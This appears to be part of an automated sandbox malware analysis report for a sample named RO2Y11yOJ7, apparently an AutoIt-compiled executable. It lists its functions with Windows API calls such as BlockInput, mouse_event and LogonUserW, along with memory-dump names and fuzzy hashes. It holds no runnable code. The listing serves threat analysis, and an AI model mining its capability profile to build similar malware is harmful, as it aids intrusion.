                                                          • Opcode Fuzzy Hash: 4a6c46a8d3d2d29eef4a73a0f2e8b1af26d2654e412811a61722057259f76e6b
                                                          • Instruction Fuzzy Hash: 3CB10120E2AF404DD72396399931336BB5CAFBB6C5F52D71BFC2A74E22EB2185834141
                                                          Function 003B401F Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 003B403A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 57c4b8cd7ff7b853adf584a0a33e8334c5ea6bc684ee9ec2638542811a365d83
                                                          • Instruction ID: 9590da3303a1a5466024ce4716ddd3ffbe55ba0144ff3342e9591ecad5426781
                                                          • Opcode Fuzzy Hash: 57c4b8cd7ff7b853adf584a0a33e8334c5ea6bc684ee9ec2638542811a365d83
                                                          • Instruction Fuzzy Hash: 79E012712001145FC711AF59D444A96FBDCAF68764F018016F949DB751DA70B9408B90
                                                          Function 003A4CFA Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 003A4D1D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: a53e9ebf5e1e43866d80942a169db6eeb32c8943f86332de923bfea685548d16
                                                          • Instruction ID: 3ab9ab9f9306be7cb642ec5c57696eec731f239f2f6d1464134fbf7f599ee64e
                                                          • Opcode Fuzzy Hash: a53e9ebf5e1e43866d80942a169db6eeb32c8943f86332de923bfea685548d16
                                                          • Instruction Fuzzy Hash: 83D05EA012020538FC2A0B289C1FF76210DF3C3792FA505493602CA0C7A8E86841A035
                                                          Function 00398A73 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003986B1), ref: 00398A93
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: 62fc4445b00a31f26f91c33b9f663af35fd553a28bdec64c6c741757f5c9415a
                                                          • Instruction ID: e5519b0abcb716acfb599c30975b98c02981ffdb91e67160a53e5cc97ef2f8b7
                                                          • Opcode Fuzzy Hash: 62fc4445b00a31f26f91c33b9f663af35fd553a28bdec64c6c741757f5c9415a
                                                          • Instruction Fuzzy Hash: F3D05E3226050EAFEF019EA4DC01EBE3B6AEB04B01F408111FE15C50A1C775E835AB60
                                                          Function 0038215F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00382171
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 27c4e115dc16078e15e9c87bbf4c0679948d9ea59fbdbb8ee7b563196560f225
                                                          • Instruction ID: f9e9fdfa8ee5e027726a0adbce1655b2e64c4208ba681279a53e2367bd9fed81
                                                          • Opcode Fuzzy Hash: 27c4e115dc16078e15e9c87bbf4c0679948d9ea59fbdbb8ee7b563196560f225
                                                          • Instruction Fuzzy Hash: B2C04CF1801119DBCB06DB90D988DEE77BCAB04704F104096A101F2500D7749B448B71
                                                          Function 0036A2A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0036A2AA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 3a05c1f2d67906932a194d85ea3797e36fc41065210813540e99d53e520cab66
                                                          • Instruction ID: 12ca8c5472b1c937089a1010175d978ca261ef9d24051b911c9533b9de4ddb52
                                                          • Opcode Fuzzy Hash: 3a05c1f2d67906932a194d85ea3797e36fc41065210813540e99d53e520cab66
                                                          • Instruction Fuzzy Hash: F1A0113000020CBB8A022B82EC08888BFAEEA802A0B008020F80C800228B32AA208A80
                                                          Function 0034C5B1 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4
                                                          • API String ID: 0-4088798008
                                                          • Opcode ID: bea44be05c6dc790d6ba57b25e5e2be104f700787867ab01e0d03a2b2bcca7f3
                                                          • Instruction ID: 805687ce0831c3011e610a1a45c172d3a2c68a0d6cddc1f2a3e17698dd9f3dcf
                                                          • Opcode Fuzzy Hash: bea44be05c6dc790d6ba57b25e5e2be104f700787867ab01e0d03a2b2bcca7f3
                                                          • Instruction Fuzzy Hash: CC3182A390A3D16FFB6387305C929D23BA1BF57360B2B15DAC5806F1A3DA247907DB41
                                                          Function 00358968 Relevance: .6, Instructions: 590COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1565f5d2d91b1fb6d3d4148833113114d5cd4512b2fa6fbf0a619302ce91ceb8
                                                          • Instruction ID: be22b7564353fa60cad1d95054232b07046a9e0eca29fafccc46681101c470ba
                                                          • Opcode Fuzzy Hash: 1565f5d2d91b1fb6d3d4148833113114d5cd4512b2fa6fbf0a619302ce91ceb8
                                                          • Instruction Fuzzy Hash: 00223870600555CBDF3B8F58C494A7CB7A9FB01306F66846ADC92AB9B1EB309DC9C740
                                                          Function 00362345 Relevance: .3, Instructions: 345COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction ID: 52c2c12ebde34573e60887ea5561b1b2cfa7f0b24df46541f36afbb2cdf5d356
                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction Fuzzy Hash: 61C16F362154930ADB2F463A843443FFEA15AA27B231B875DE8B3DF1D9EF20C5649620
                                                          Function 0036277A Relevance: .3, Instructions: 341COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction ID: a32f8b706f250003e7686f1980c46817876125ae53b883a56e2234dd8fc475e3
                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction Fuzzy Hash: 15C1523261559309DB6E463AC43413FBFA15AA27B231F876DE4B2DF1D9EF20C524E620
                                                          Function 00361AF8 Relevance: .3, Instructions: 323COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction ID: 0fe7ee07ae1ffac9c2f0795d3fafacfd297de7932efaa3d480aba9115804d7e7
                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction Fuzzy Hash: F6C15E3261519309DF6F463A843413EBEA15AA27B231F976DE4B3DF1D8EF20C564E620
                                                          Function 003C35D4 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,003CF910), ref: 003C3690
                                                          • IsWindowVisible.USER32(?), ref: 003C36B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: 0b484c8cbf1c169d30a033ef08e5cb4666012b3f371308f253616636924fe1d1
                                                          • Instruction ID: b3995995cd97b77dc09911c7e1a785ff803ebcbf6be741fc5352252c0c27275f
                                                          • Opcode Fuzzy Hash: 0b484c8cbf1c169d30a033ef08e5cb4666012b3f371308f253616636924fe1d1
                                                          • Instruction Fuzzy Hash: 74D17D342143019BCB16EF10C491F6EB7AAAF95354F14855DF8869F7A2CB31EE1ACB81
                                                          Function 003CA60C Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 003CA662
                                                          • GetSysColorBrush.USER32(0000000F), ref: 003CA693
                                                          • GetSysColor.USER32(0000000F), ref: 003CA69F
                                                          • SetBkColor.GDI32(?,000000FF), ref: 003CA6B9
                                                          • SelectObject.GDI32(?,00000000), ref: 003CA6C8
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 003CA6F3
                                                          • GetSysColor.USER32(00000010), ref: 003CA6FB
                                                          • CreateSolidBrush.GDI32(00000000), ref: 003CA702
                                                          • FrameRect.USER32(?,?,00000000), ref: 003CA711
                                                          • DeleteObject.GDI32(00000000), ref: 003CA718
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 003CA763
                                                          • FillRect.USER32(?,?,00000000), ref: 003CA795
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CA7C0
                                                            • Part of subcall function 003CA8FC: GetSysColor.USER32(00000012), ref: 003CA935
                                                            • Part of subcall function 003CA8FC: SetTextColor.GDI32(?,?), ref: 003CA939
                                                            • Part of subcall function 003CA8FC: GetSysColorBrush.USER32(0000000F), ref: 003CA94F
                                                            • Part of subcall function 003CA8FC: GetSysColor.USER32(0000000F), ref: 003CA95A
                                                            • Part of subcall function 003CA8FC: GetSysColor.USER32(00000011), ref: 003CA977
                                                            • Part of subcall function 003CA8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003CA985
                                                            • Part of subcall function 003CA8FC: SelectObject.GDI32(?,00000000), ref: 003CA996
                                                            • Part of subcall function 003CA8FC: SetBkColor.GDI32(?,00000000), ref: 003CA99F
                                                            • Part of subcall function 003CA8FC: SelectObject.GDI32(?,?), ref: 003CA9AC
                                                            • Part of subcall function 003CA8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 003CA9CB
                                                            • Part of subcall function 003CA8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003CA9E2
                                                            • Part of subcall function 003CA8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 003CA9F7
                                                            • Part of subcall function 003CA8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003CAA1F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 3521893082-0
                                                          • Opcode ID: 9517cbaeb5729422a73b93b391211917893fa3d25261eec8106d5e389ca7c2de
                                                          • Instruction ID: fcdd7109fd7219637a12efad3a72f6883363c5f57784ecee3cf67600d1ae22d8
                                                          • Opcode Fuzzy Hash: 9517cbaeb5729422a73b93b391211917893fa3d25261eec8106d5e389ca7c2de
                                                          • Instruction Fuzzy Hash: DE917C72008705EFD7129F64DC08E5B7BAEFF89325F144A29FAA2D61A0C771E944CB52
                                                          Function 00342C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 00342CA2
                                                          • DeleteObject.GDI32(00000000), ref: 00342CE8
                                                          • DeleteObject.GDI32(00000000), ref: 00342CF3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00342CFE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00342D09
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0037C5BB
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0037C5F4
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0037CA1D
                                                            • Part of subcall function 00341B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00342036,?,00000000,?,?,?,?,003416CB,00000000,?), ref: 00341B9A
                                                          • SendMessageW.USER32(?,00001053), ref: 0037CA5A
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0037CA71
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0037CA87
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0037CA92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: ccd58e0a25d946009749bf111f9eed5608dcd9540cc89f1d49262e64e2bc9673
                                                          • Instruction ID: 45ad79f442a574d4645c3552a4e7a08ed05345c51b56e064d0a46e54f609a71f
                                                          • Opcode Fuzzy Hash: ccd58e0a25d946009749bf111f9eed5608dcd9540cc89f1d49262e64e2bc9673
                                                          • Instruction Fuzzy Hash: 0B128A30610201AFCB26CF24C884BAAB7E5FF05311F55956DF999EB662CB35EC42CB51
                                                          Function 003B75C0 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 003B75F3
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003B76B2
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003B76F0
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003B7702
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003B7748
                                                          • GetClientRect.USER32(00000000,?), ref: 003B7754
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003B7798
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003B77A7
                                                          • GetStockObject.GDI32(00000011), ref: 003B77B7
                                                          • SelectObject.GDI32(00000000,00000000), ref: 003B77BB
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003B77CB
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B77D4
                                                          • DeleteDC.GDI32(00000000), ref: 003B77DD
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003B7809
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 003B7820
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003B785B
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003B786F
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 003B7880
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003B78B0
                                                          • GetStockObject.GDI32(00000011), ref: 003B78BB
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003B78C6
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003B78D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 5fae26cdda3dbb517f12f7a51fc46386c1c502a3007cebf028fa2890ecb076f1
                                                          • Instruction ID: 391c70d1ac3d065597667cec2c3f47f59536d96e3e6006d5b757b518f7dfd26f
                                                          • Opcode Fuzzy Hash: 5fae26cdda3dbb517f12f7a51fc46386c1c502a3007cebf028fa2890ecb076f1
                                                          • Instruction Fuzzy Hash: 73A14CB1A40615BFEB159BA8DD4AFAF7BA9EB44714F004158FA15EB2E0C770AD00CF64
                                                          Function 003AAD9C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003AADAA
                                                          • GetDriveTypeW.KERNEL32(?,003CFAC0,?,\\.\,003CF910), ref: 003AAE87
                                                          • SetErrorMode.KERNEL32(00000000,003CFAC0,?,\\.\,003CF910), ref: 003AAFE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
